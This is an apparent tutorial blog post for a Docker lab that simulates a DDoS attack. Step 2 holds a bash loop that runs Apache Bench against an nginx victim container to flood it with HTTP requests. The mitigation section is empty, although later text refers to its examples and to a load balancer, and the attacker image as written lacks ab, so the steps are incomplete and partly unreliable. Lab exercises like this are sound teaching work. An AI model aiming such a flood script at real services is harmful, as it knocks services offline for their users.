DDoS Attack Simulation using Docker - Learning Cybersecurity Through Hands-On Lab

Introduction

Understanding the Significance of DDoS Attacks:

In today’s interconnected digital landscape, Distributed Denial of Service (DDoS) attacks have emerged as one of the most prevalent and disruptive threats. DDoS attacks involve overwhelming a target system or network with an avalanche of traffic, rendering it inaccessible to legitimate users. The impact of a successful DDoS attack can be devastating, causing financial losses, reputational damage, and downtime for online services. These attacks are often launched by malicious actors with various motivations, such as extortion, competitive advantage, or ideological reasons.

Exploring DDoS Attacks Through Practical Lab:

To truly grasp the potential consequences of DDoS attacks and to better understand how to defend against them, we’ll be conducting a hands-on lab using Docker. This lab will provide a unique opportunity to simulate a DDoS attack scenario in a controlled environment. By engaging in this practical exercise, we aim to shed light on the mechanics of such attacks and equip you with valuable insights into effective mitigation techniques.

Using Docker to Simulate and Defend:

Through Docker, we can recreate a realistic DDoS attack and examine how it impacts an online service. We’ll showcase how Docker containers can be leveraged to perform such simulations securely, isolating the attack from the actual network. Our lab will not only demonstrate the attack itself but also delve into the implementation of countermeasures to mitigate its effects.

By immersing ourselves in this practical lab, we’re taking a proactive approach to learning about DDoS attacks. This hands-on experience will empower you to comprehend the challenges faced by cybersecurity professionals and to explore potential solutions that safeguard online services against these disruptive attacks. The insights gained from this lab will enable you to better appreciate the intricate world of cybersecurity and contribute to a safer digital ecosystem.

Lab Setup + Steps

  1. Install Docker on your machine if you haven’t already.
  2. Pull or create two Docker images: one for the victim server and one for the attacker. You can use official images or customize your own.

Step 1: Create the Victim Container:

  1. Create a new directory for your victim container:

    mkdir victim
  2. Inside the victim directory, create an index.html file with a simple HTML content. You can use any text editor of your choice, such as nano or vim. Here’s an example using echo command:

    echo "Welcome to Victim Server" > victim/index.html
  3. Create a Dockerfile in the victim directory with instructions to use an HTTP server (e.g., nginx) and copy the index.html file. Use a text editor to create the Dockerfile:

    nano victim/Dockerfile
  4. Add the following content to the Dockerfile:

    # Use the official NGINX image as the base image
    FROM nginx:alpine
    
    # Copy the custom index.html file to the NGINX document root
    COPY index.html /usr/share/nginx/html/index.html
  5. Build the Docker image for the victim container using the Dockerfile:

    docker build -t victim-image victim

With these commands, you’ve created a Docker image for the victim container with a basic HTML file served by NGINX. This image will be used to run the victim container in the subsequent steps. Remember to customize the index.html file and Dockerfile according to your preferences if needed.

Step 2: Create the Attacker Container:

  1. Create a new directory for your attacker container:

    mkdir attacker
  2. Inside the attacker directory, create a file named attack.sh using a text editor of your choice. Here’s an example using nano:

    nano attacker/attack.sh
  3. Write the following bash script in the attack.sh file. This script uses Apache Bench (ab) to simulate a DDoS attack by sending a large number of requests to the victim server. Adjust the parameters (-n for number of requests, -c for concurrency) as needed:

    #!/bin/bash
    for i in {1..100}; do
        ab -n 1000 -c 10 http://victim-container-ip/
        sleep 1
    done
  4. Make the attack.sh script executable:

    chmod +x attacker/attack.sh
  5. Create a Dockerfile in the attacker directory with instructions to use a basic Linux image and copy the attack.sh script. Use a text editor to create the Dockerfile:

    nano attacker/Dockerfile
  6. Add the following content to the Dockerfile:

    # Use a basic Linux image as the base image
    FROM alpine
    
    # Copy the attack.sh script to the container
    COPY attack.sh /attack.sh
    
    # Make the script executable
    RUN chmod +x /attack.sh
  7. Build the Docker image for the attacker container using the Dockerfile:

    docker build -t attacker-image attacker

With these commands, you’ve created a Docker image for the attacker container, along with the necessary script to simulate a DDoS attack using Apache Bench. This image will be used to run the attacker container in the subsequent steps. Remember to customize the attack.sh script and Dockerfile if needed.

Step 3: Launch the Lab:

  1. Start the victim container: docker run -d --name victim-container victim-image.
  2. Retrieve the IP address of the victim container: docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' victim-container.
  3. Start the attacker container: docker run -it attacker-image.

Step 4: Simulate the DDoS Attack:

  1. Inside the attacker container, run the attack.sh script to initiate the DDoS attack:

    ./attack.sh

Checking the Effect of the Attack:

  1. While the attack script is running, monitor the victim container’s performance using the following steps:

  2. Open a new terminal window or tab.

  3. List the running Docker containers to find the victim container’s name or ID:

    docker ps
  4. Use the docker stats command to continuously display the resource usage of the victim container. Replace victim-container-name with the actual name or ID of the victim container:

    docker stats victim-container-name
  5. Observe the statistics displayed in real-time, including CPU usage, memory consumption, network traffic, and more. You should notice a significant increase in resource utilization as the attack script continues to generate traffic.

  6. Additionally, you can try accessing the victim container’s web service from your browser or using a tool like curl to see if the service becomes slow or unresponsive:

    curl http://victim-container-ip/
  7. As the attack progresses, you’ll likely observe a degradation in performance, longer response times, or even unavailability of the web service.

  8. To stop the attack, go back to the terminal where the attack.sh script is running (attacker container terminal) and press Ctrl+C.

By following these steps, you’ll be able to actively witness the impact of the DDoS attack on the victim container’s resources and web service. This practical observation underscores the importance of understanding DDoS attacks and the potential harm they can cause to online services.

Step 5: Implement Mitigation Techniques:

  1. Stop the attack in the attacker container: Inside the attacker container terminal, press Ctrl+C to stop the running attack.sh script.

  2. Implement countermeasures:

Remember to customize the rate limiting, traffic filtering, and load balancing configurations according to your needs. These are just basic examples to illustrate the mitigation techniques.

Conclusion

Cleanup:

  1. Stop and remove the attacker container:

    docker stop attacker-container-name
    docker rm attacker-container-name
  2. Remove the attacker Docker image (optional):

    docker rmi attacker-image
  3. Stop and remove the victim container:

    docker stop victim-container-name
    docker rm victim-container-name
  4. Remove the victim Docker image (optional):

    docker rmi victim-image
  5. If you set up a load balancer for mitigation, stop and remove the load balancer container:

    docker stop nginx-load-balancer
    docker rm nginx-load-balancer
  6. If you created an NGINX configuration directory (nginx-config) for the load balancer, delete it (optional):

    rm -r path-to-nginx-config
  7. Clean up any other resources, directories, or files created during the lab.